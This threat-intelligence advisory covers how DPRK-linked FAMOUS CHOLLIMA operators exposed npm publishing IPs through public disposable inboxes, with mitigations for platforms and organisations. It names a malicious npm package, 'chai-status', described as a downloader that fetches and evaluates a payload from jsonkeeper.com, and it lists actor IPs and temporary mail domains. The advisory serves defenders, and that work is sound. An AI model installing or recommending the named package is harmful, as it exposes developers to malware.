DPRK FAMOUS CHOLLIMA OPSEC failure exposes npm publisher IPs through public disposable inboxes

Affected ecosystem: npm registry and developer tooling supply chain
Primary issue: OPSEC leakage from disposable email inbox exposure combined with npm publish notification metadata
Exploitation status: Observed in the wild (malicious npm packages published by the actor); technique leveraged by researcher for intelligence collection
Confidence: High
Sectors at risk: Software development, open source ecosystems, CI/CD pipelines
Regions at risk: Global
Publication context: New report (KMSEC OPSEC-3)

Executive Summary

KMSEC has detailed how operators attributed to the North Korean group FAMOUS CHOLLIMA exposed operational IP addresses while publishing malicious packages to the npm registry. The actors used disposable email services with publicly accessible inboxes to register accounts. Because npm sends a notification email containing the publisher’s IP address upon each publish event, viewing these mailboxes revealed consistent exit node IPs over time.

This OPSEC lapse provides defenders with repeatable infrastructure artefacts for clustering activity, enriching alerts and improving platform abuse detection. KMSEC also observed the same disposable mailboxes receiving sign-up notifications from recruitment platforms, reinforcing links to the broader “Contagious Interview” campaign.

Context

FAMOUS CHOLLIMA, also tracked as Contagious Interview (MITRE ATT&CK group G1052), PurpleBravo and other designations, has conducted ongoing operations since at least 2023. The group targets software developers through fake job offers and technical interviews, often delivering malware via malicious code projects or compromised dependencies.

Public reporting from CrowdStrike, Recorded Future and GitLab consistently describes the group’s use of social engineering and supply chain vectors to achieve both financial gain and espionage objectives.

Technical Analysis

npm notification metadata and public mailbox exposure

When a package is published to npm, the service sends an email to the registered address that includes the IP address from which the publish request originated. Several temporary email providers used by the operators allow anyone who knows the address to view the inbox contents via a simple web URL.

KMSEC recovered multiple publishing IPs this way, including exit nodes from Astrill VPN and hide.me services. One example involves the package chai-status (version 2.4.2), published on 18 November 2025 by the account [email protected]. The package is a downloader that retrieves additional payload from jsonkeeper.com and executes it through JavaScript evaluation. Viewing the corresponding temporary mailbox revealed the IP 216.227.145.218, assessed as an Astrill VPN exit.

Consistent infrastructure usage

Publishing activity observed between September 2025 and late January 2026 showed recurring IPs over weeks and months. This pattern indicates stable preference for certain anonymisation services and enables longitudinal tracking and correlation.

A smaller number of IPs resolved to ISP space (including China Unicom and TransTeleCom) rather than commercial VPN providers. These warrant careful enrichment but represent potentially higher-signal artefacts.

Shared temporary email infrastructure

KMSEC identified multiple disposable email domains that resolve to shared backend infrastructure. Several services appear to be reskins of the same platform, with common SMTP banners and infrastructure IPs such as 91.196.52.205. This cluster (including generator.email, emailfake.com and tempm.com) was heavily used by the operators.

The author recommends platform operators perform MX record lookups and infrastructure fingerprinting rather than relying solely on domain blocklists.

Overlap with recruitment activity

Disposable mailboxes used for npm publishing also received registration confirmations from hiring platforms such as bayt.com and HireLatam. This supports existing assessments that the same infrastructure and personas are used across supply chain attacks and fake recruitment operations.

Impact Assessment

Successful compromise through malicious npm packages can lead to credential theft, token exposure and downstream supply chain incidents. The additional telemetry from KMSEC’s research strengthens defenders’ ability to detect and disrupt these operations earlier in the kill chain.

Indicators of Compromise

VPN and proxy IPs should be treated as pivot points for correlation rather than definitive attribution. The following are representative examples reported by KMSEC.

Threat Intelligence Context and ATT&CK Mapping

Mitigation Recommendations

For platform operators:

• Implement MX record and backend IP checks for sign-ups to detect disposable email infrastructure.
• Consider additional verification steps for accounts using known temporary mail services.
• Monitor for rapid or patterned publishing behaviour from new accounts.

For organisations:

• Enforce dependency pinning and lockfiles.
• Disable or restrict postinstall script execution in CI/CD environments where possible.
• Monitor npm audit logs and egress traffic from build systems for suspicious domains.
• Train developers on risks associated with unverified packages and interview-based lures.

Further Reading

• KMSEC: Tracking DPRK operator IPs over time (OPSEC-3)
• MITRE ATT&CK: Contagious Interview (G1052)
• GitLab Threat Intelligence: North Korean tradecraft report
• Recorded Future: PurpleBravo targeting of the IT software supply chain
• CrowdStrike: FAMOUS CHOLLIMA adversary profile
• FAMOUS CHOLLIMA: DPRK employment fraud and developer-lure intrusion set – TIR
• DPRK fake interview lures and recruitment-driven access operations summary – TIR